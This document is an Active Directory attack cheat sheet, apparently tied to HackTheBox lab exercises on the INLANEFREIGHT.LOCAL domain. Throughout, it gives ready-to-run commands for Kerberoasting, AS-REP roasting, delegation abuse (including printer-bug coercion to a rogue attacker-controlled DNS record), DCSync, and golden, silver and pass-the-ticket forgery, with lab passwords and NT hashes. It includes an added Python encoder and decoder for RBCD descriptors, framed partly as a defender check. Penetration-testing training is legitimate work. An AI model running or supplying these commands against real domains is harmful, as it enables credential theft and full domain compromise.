From Linux
GetUserSPNs.py (Impacket)
# Request a service ticket for one account
GetUserSPNs.py -dc-ip <ip> <domain>/<user> -request-user <username>
# Request service tickets for every account that has an SPN
GetUserSPNs.py -dc-ip <ip> <domain>/<user> -request
# Save the ticket hash to an output file
GetUserSPNs.py -dc-ip <ip> INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs
# Crack the TGS hash ($ROCKYOU holds the wordlist path); -m 13100 is for RC4 (etype 23) tickets, AES tickets use -m 19600 (etype 17) / -m 19700 (etype 18)
hashcat -m 13100 sqldev_tgs $ROCKYOU
From Windows
setspn.exe
# Find accounts with an SPN
setspn.exe -Q */*
# Better: request a service ticket for every SPN found (tickets land in the current logon session; export them with Mimikatz below)
Add-Type -AssemblyName System.IdentityModel
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
Mimikatz
# Enable Base64 output so exported tickets are printed to the console instead of written to disk
base64 /out:true
# Export the tickets of the current logon session
kerberos::list /export
# Strip the line breaks from the printed blob and save it
echo "<base64 blob>" | tr -d '\n' > encoded_file
# Decode it back into a .kirbi file
cat encoded_file | base64 -d > sqldev.kirbi
# Convert the .kirbi to John format
python2.7 kirbi2john.py sqldev.kirbi > sqldev_tgs_john
# Hashcat way: rewrite the John line into the hashcat 13100 format ($krb5tgs$23$*user$realm$spn*$checksum$edata)
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' sqldev_tgs_john > sqldev_tgs_hashcat
PowerView
# Import the module
Import-Module .\PowerView.ps1
# List users with an SPN
Get-DomainUser * -SPN | select samaccountname
# Target a single user and output the ticket in hashcat format
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
Rubeus
# Statistics on roastable accounts (encryption types, password-last-set years) without requesting any ticket
.\Rubeus.exe kerberoast /stats
# Roast only accounts with admincount=1 (high-value, AdminSDHolder-protected accounts)
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
Double Hop Workarounds
Method 1: PSCredential Object
# Set the password
$SecPassword = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force
# Build the credential object
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)
# Pass the credential explicitly so the remote host can authenticate to the DC on our behalf
Get-DomainUser -SPN -Credential $Cred | select samaccountname
Method 2: Register PSSession Configuration
# Check which tickets are present (inside a WinRM session only the HTTP service ticket is there, no TGT, hence the double hop)
klist
# Register a session configuration that runs as backupadm (WinRM has to be restarted afterwards)
Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm
# Connect through the new configuration
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess
Roasting Attacks
AS-REP Roasting (Windows)
AS-REP Roasting Enumeration
# PowerView: discover accounts with Kerberos pre-authentication disabled
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | select samaccountname, useraccountcontrol
# Rubeus: roast every account that does not require pre-authentication
Rubeus.exe asreproast /format:hashcat
Performing AS-REP Roasting
# Rubeus, single user
.\Rubeus.exe asreproast /user:jenna.smith /domain:inlanefreight.local /dc:dc01.inlanefreight.local /nowrap /outfile:hashes.txt
# Crack the hash (-m 18200 = AS-REP, etype 23)
hashcat.exe -m 18200 hashes.txt $ROCKYOU
Set DONT_REQ_PREAUTH (PowerView)
# Requires write access to the user's userAccountControl; 4194304 (0x400000) is the DONT_REQ_PREAUTH bit
Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose
AS-REP Roasting (Linux)
AS-REP Roasting With Domain Credentials
GetNPUsers.py inlanefreight.local/pixis -request -format hashcat
Find Roastable Accounts Without Credentials (from a user list)
GetNPUsers.py INLANEFREIGHT/ -dc-ip 10.129.205.35 -usersfile /tmp/users.txt -format hashcat -no-pass
Kerberoasting (Windows)
Manual Enumeration (PowerShell Script)
# FindSPNAccounts.ps1: list every user object that has a servicePrincipalName
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.Filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.FindAll()
foreach ($result in $results)
{
    $userEntry = $result.GetDirectoryEntry()
    Write-Host "User"
    Write-Host "===="
    Write-Host $userEntry.name "(" $userEntry.distinguishedName ")"
    Write-Host ""
    Write-Host "SPNs"
    Write-Host "===="
    foreach ($SPN in $userEntry.servicePrincipalName)
    {
        $SPN
    }
    Write-Host ""
    Write-Host ""
}
# Run the script
.\FindSPNAccounts.ps1
Find Accounts with SPN (PowerView)
# Find accounts
Get-DomainUser -SPN | select samaccountname, serviceprincipalname, memberof
Invoke Kerberoasting (PowerView)
Rubeus Kerberoasting
Rubeus.exe kerberoast /nowrap
Kerberoasting Without an Account Password (AS-requested service tickets)
https://www.semperis.com/blog/new-attack-paths-as-requested-sts/
To perform this attack we only need:
The username of an account that does not require Kerberos pre-authentication (DONT_REQ_PREAUTH). Rubeus sends an AS-REQ in that account's name asking directly for the target SPN, so no password or hash is required; the returned ticket is encrypted with the service account's key and cracked as usual.
Rubeus.exe kerberoast /nopreauth:amber.smith /domain:inlanefreight.local /spn:MSSQLSvc/SQL01:1433 /nowrap
Kerberoasting (Linux)
Request service tickets for all accounts with an SPN
GetUserSPNs.py inlanefreight.local/pixis -request
Unconstrained Delegation
Unconstrained Delegation - Computer
Method 1 (Wait for an Authentication)
1 Monitor Stored Tickets (Rubeus)
.\Rubeus.exe monitor /interval:5 /nowrap
2 Use the Captured TGT to Request a Service Ticket
.\Rubeus.exe asktgs /ticket:<base64> /service:cifs/dc01.INLANEFREIGHT.local /ptt
3 Use the New Ticket
dir \\dc01.inlanefreight.local\c$
Method 2 (Printer Bug)
https://github.com/leechristensen/SpoolSample
1 Monitor Tickets
.\Rubeus.exe monitor /interval:5 /nowrap
2 Abuse the Printer Bug (coerce DC01 to authenticate to SQL01, the host with unconstrained delegation)
.\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local
3 Capture & Renew the Ticket
# Once DC01$'s TGT is intercepted, renew it and inject it into the current session
.\Rubeus.exe renew /ticket:<base64> /ptt
4 DCSync
# Holding DC01$'s TGT we can DCSync; pull the Administrator hash (or /all for every account)
lsadump::dcsync /domain:inlanefreight.local /user:Administrator
5 Use the NT Hash
# With the hash from DCSync, request a TGT as that user and inject it
.\Rubeus.exe asktgt /rc4:<NT-Hash> /user:<user> /ptt
# Act on DC01
dir \\dc01.inlanefreight.local\c$
Unconstrained Delegation - Users
Gather Users With Unconstrained Delegation (PowerView)
# 524288 (0x80000) is the TRUSTED_FOR_DELEGATION bit
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" | select samaccountname, useraccountcontrol
1 Create a Fake DNS Record
https://github.com/dirkjanm/krbrelayx
# Add a DNS record that points the rogue hostname at the attacker host (10.10.14.2); the last argument is the DC
python dnstool.py -u 'INLANEFREIGHT.LOCAL\pixis' -p p4ssw0rd -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.14.2 --action add 10.129.1.207
2 Verify DNS
nslookup roguecomputer.inlanefreight.local dc01.inlanefreight.local
3 Add an SPN for the Rogue Host to the Delegation User
# sqldev has unconstrained delegation, so service tickets for CIFS/roguecomputer are encrypted with its key and carry the client's forwarded TGT
python addspn.py -u 'inlanefreight.local\pixis' -p p4ssw0rd --target-type samname -t sqldev -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local
4 Start krbrelayx to Decrypt Incoming Tickets
# krbrelayx listens on the attacker host and decrypts the tickets with sqldev's NT hash
sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58
5 Trigger the Printer Bug (from a second shell)
https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
# Coerce DC01 to authenticate to the rogue hostname; the name must match the SPN added in step 3
python3 printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 roguecomputer.inlanefreight.local
6 Collect the Ticket
# krbrelayx extracts DC01$'s TGT from the forwarded ticket and writes it to a .ccache file
7 Export the ccache + Secrets Dump
export KRB5CCNAME=<ccache>
secretsdump.py -k -no-pass dc01.inlanefreight.local
Constrained Delegation
Constrained Delegation (Windows)
Gather Computers With Constrained Delegation
Get-DomainComputer -TrustedToAuth | select serviceprincipalname, dnshostname, msds-allowedtodelegateto, useraccountcontrol
1 Get the Machine Account Hash (Mimikatz)
.\mimikatz.exe "privilege::debug" "sekurlsa::msv" "exit"
2 Constrained Delegation Attack (S4U2self + S4U2proxy)
# Needs the delegating machine account's NT hash (rc4); /msdsspn is the SPN allowed in msDS-AllowedToDelegateTo, /altservice swaps the service class of the resulting ticket
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:ff955e93a130f5bb1a6565f32b7dc127 /ptt
# Verify the ticket
klist
# Enter a session (the HTTP ticket covers WinRM)
Enter-PSSession ws01.inlanefreight.local
Constrained Delegation (Linux)
1 Find Delegation Accounts
findDelegation.py INLANEFREIGHT.LOCAL/carole.rose:jasmine
2 Craft a Service Ticket via S4U2self/S4U2proxy
# -spn must be one of the SPNs listed in the account's msDS-AllowedToDelegateTo (see step 1)
getST.py -spn cifs/SERVER01.INLANEFREIGHT.LOCAL 'INLANEFREIGHT.LOCAL/daniel.whitehead:dolphin' -impersonate Administrator
3 Log In With the Service Ticket
# Export the ccache
export KRB5CCNAME=<ccache>
# Log in to the host the ticket was issued for
psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@SERVER01.INLANEFREIGHT.LOCAL -debug
Resource Based Delegation (Windows)
Enumerate RBCD Candidates (Script)
# Import the PowerView module
Import-Module C:\Tools\PowerView.ps1
# Get all computers in the domain
$computers = Get-DomainComputer
# Get all users in the domain
$users = Get-DomainUser
# Rights that allow writing msDS-AllowedToActOnBehalfOfOtherIdentity (WriteProperty only if it covers that attribute or all properties)
$accessRights = "GenericWrite", "GenericAll", "WriteProperty", "WriteDacl"
$rightsPattern = $accessRights -join '|'
# Loop through each computer in the domain
foreach ($computer in $computers) {
    # Get the security descriptor of the computer object
    $acl = Get-ObjectAcl -SamAccountName $computer.SamAccountName -ResolveGUIDs
    # Loop through each user in the domain
    foreach ($user in $users) {
        # Keep the ACEs granted to this user that carry one of the required rights
        $hasAccess = $acl | ? { $_.SecurityIdentifier -eq $user.ObjectSID -and $_.ActiveDirectoryRights -match $rightsPattern }
        if ($hasAccess) {
            Write-Output "$($user.SamAccountName) has the required access rights on $($computer.Name)"
        }
    }
}
1 Create a Fake Computer
# Import Powermad
Import-Module .\Powermad.ps1
# Add a new machine account (allowed by the default ms-DS-MachineAccountQuota of 10)
New-MachineAccount -MachineAccount HACKTHEBOX -Password $(ConvertTo-SecureString "Hackthebox123+!" -AsPlainText -Force)
2 Modify the Target Computer's Attribute
Build a security descriptor from SDDL, convert it to raw binary form and write it into the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity:
# Import PowerView
Import-Module .\PowerView.ps1
# Step 1: SID of the fake computer
$ComputerSid = Get-DomainComputer HACKTHEBOX -Properties objectsid | Select -Expand objectsid
# Step 2: SDDL -> binary security descriptor (owner BA, one allow ACE granting the fake computer full control)
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Step 3: credentials of the user that has write rights over the target (found with the enumeration script)
$credentials = New-Object System.Management.Automation.PSCredential "INLANEFREIGHT\carole.holmes", (ConvertTo-SecureString "Y3t4n0th3rP4ssw0rd" -AsPlainText -Force)
# Step 4: write the descriptor onto the target computer object
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose
3 Get the Fake Computer's Hash
.\Rubeus.exe hash /password:Hackthebox123+! /user:HACKTHEBOX$ /domain:inlanefreight.local
4 Request a Service Ticket (S4U)
# /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm adds tickets for other services on the same host
.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt
# Connect to the DC
ls \\dc01.inlanefreight.local\c$
Resource Based Delegation (Linux)
1 Create a New Computer
addcomputer.py -computer-name 'HACKTHEBOX$' -computer-pass 'Hackthebox123+!' -dc-ip 10.129.96.44 'inlanefreight.local/carole.holmes:Y3t4n0th3rP4ssw0rd'
2 Add the Computer to the Target's msDS-AllowedToActOnBehalfOfOtherIdentity
https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py
python3 rbcd.py -dc-ip 172.16.8.35 -t DC01 -f HACKTHEBOX 'inlanefreight.local/annette.jackson:horses'
3 Request a Service Ticket
# Authenticate as the fake machine account (note the trailing $) and impersonate Administrator towards DC01
getST.py -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip 10.129.96.44 'inlanefreight.local/HACKTHEBOX$:Hackthebox123+!'
4 Export the ccache & Log In
# Export the ccache
export KRB5CCNAME=<ccache>
# psexec with the ticket
psexec.py -k -no-pass dc01.inlanefreight.local
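What both the PowerShell RawSecurityDescriptor step and rbcd.py actually write into msDS-AllowedToActOnBehalfOfOtherIdentity, as an added example that is not part of the original cheat sheet nor of PowerView, Powermad or the rbcd-attack project: the attribute is a self-relative Windows SECURITY_DESCRIPTOR whose DACL holds one ACCESS_ALLOWED ACE per principal allowed to act on behalf of other identities. The code below encodes the exact equivalent of the SDDL string `O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<sid>)` used above (the rights string expands to access mask 0xF01FF) and decodes an existing descriptor back into the list of trusted SIDs, which is the check a defender runs over computer objects to spot a rogue machine account that has been added. The SIDs used in the test are constructed from the domain SID on this page with made-up RIDs.

```python
import struct

BUILTIN_ADMINS = "S-1-5-32-544"          # SDDL "BA", the owner in the SDDL string above
ACE_MASK_FULL_CONTROL = 0x000F01FF        # CCDCLCSWRPWPDTLOCRSDRCWDWO expanded to an access mask
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...-1234' -> binary SID: revision, sub-authority count, 48-bit big-endian authority, LE sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID: " + sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf: bytes, off: int = 0) -> str:
    """Inverse of sid_to_bytes, reading the SID that starts at offset off."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def build_rbcd_descriptor(allowed_sids, owner: str = BUILTIN_ADMINS) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR equal to SDDL O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<sid>) for each SID."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACCESS_ALLOWED_ACE: AceType, AceFlags, AceSize, Mask, SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), ACE_MASK_FULL_CONTROL) + sid_b
    # ACL header: AclRevision (4 = ACL_REVISION_DS, as Impacket writes; Windows emits 2 for a DACL without object ACEs),
    # Sbz1, AclSize, AceCount, Sbz2
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner_b = sid_to_bytes(owner)
    owner_off = 20                          # owner SID follows the 20-byte header directly
    dacl_off = owner_off + len(owner_b)
    # Header: Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl (no group, no SACL)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, owner_off, 0, 0, dacl_off)
    return header + owner_b + dacl


def allowed_to_act(sd: bytes):
    """Decode msDS-AllowedToActOnBehalfOfOtherIdentity: (SID, mask) for every ACCESS_ALLOWED ACE in the DACL."""
    _, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, found = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            found.append((bytes_to_sid(sd, off + 8), mask))
        off += ace_size                      # AceSize lets unknown ACE types be skipped safely
    return found
```

Feeding the bytes from `build_rbcd_descriptor` to the `Set-DomainObject -Set` step is equivalent to the `$SDBytes` produced by RawSecurityDescriptor; running `allowed_to_act` over the attribute value read back from LDAP (for example the raw bytes that `Get-DomainComputer DC01 -Properties msds-allowedtoactonbehalfofotheridentity` returns) lists every SID that may impersonate users to that host, so any SID that resolves to a recently created machine account is the artefact this attack leaves behind.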
Ticket Abuse
Golden Ticket (Windows)
A Golden Ticket needs four pieces of information: the domain name, the domain SID, the krbtgt NT hash (or AES key) and the user to impersonate.
1 Gather the Domain Name
2 Gather the Domain SID
3 Gather the krbtgt Hash
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:krbtgt /domain:inlanefreight.local" "exit"
4 Forge the Golden Ticket
.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt" "exit"
5 Log In
# /ptt injected the forged TGT into the current session; verify with klist and use it against any host in the domain
Golden Ticket (Linux)
1 Gather the Domain SID
lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids
2 Create the Golden Ticket
ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local Administrator
3 Import and Use the Ticket
export KRB5CCNAME=<ccache>
# Login
psexec.py -k -no-pass dc01.inlanefreight.local
Silver Ticket (Windows)
1 Gather the Domain SID
2 Compromise the Service Account
The NT hash (or AES key) of the account that runs the target service is required (for CIFS on sql01 that is the SQL01$ machine account); without it a silver ticket cannot be forged.
3 Forge the Silver Ticket
.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs /ptt" "exit"
Create a Sacrificial Process
# Create a new logon session so the forged ticket does not overwrite the tickets of the current one
Rubeus.exe createnetonly /program:cmd.exe /show
# Import the silver ticket (saved to sql01.kirbi with /ticket: instead of /ptt in the step above)
Rubeus.exe ptt /ticket:sql01.kirbi
# Login
PsExec.exe -accepteula \\sql01.inlanefreight.local cmd
Silver Ticket (Linux)
1 Retrieve the Domain SID
lookupsid.py inlanefreight.local/pixis@dc01.inlanefreight.local -domain-sids
2 Create the Silver Ticket
ticketer.py -nthash 542780725df68d3456a0672f59001987 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local -spn cifs/sql01.inlanefreight.local Administrator
3 Export the ccache
export KRB5CCNAME=<ccache>
# Login
smbclient.py -k -no-pass sql01.inlanefreight.local
Pass The Ticket
Pass-the-Ticket reuses a stolen Ticket Granting Ticket (TGT) or service ticket (TGS). The TGT is encrypted with the krbtgt key and carries the user's PAC (group memberships); presenting it to the Domain Controller yields service tickets for any host, while a stolen service ticket only grants access to the service it was issued for. Either one enables lateral movement as that user without knowing the password.
1 Create a Sacrificial Process
.\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
2 Read Tickets
# Dump the krbtgt/INLANEFREIGHT.LOCAL ticket (the TGT) from the chosen logon session
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap
3 Renew and Inject the Ticket
# /renew asks the KDC for a fresh copy of the (renewable) TGT and injects it; Rubeus.exe ptt /ticket:<base64> imports it as-is instead
Rubeus.exe renew /ticket:<base64> /ptt
4 Read Files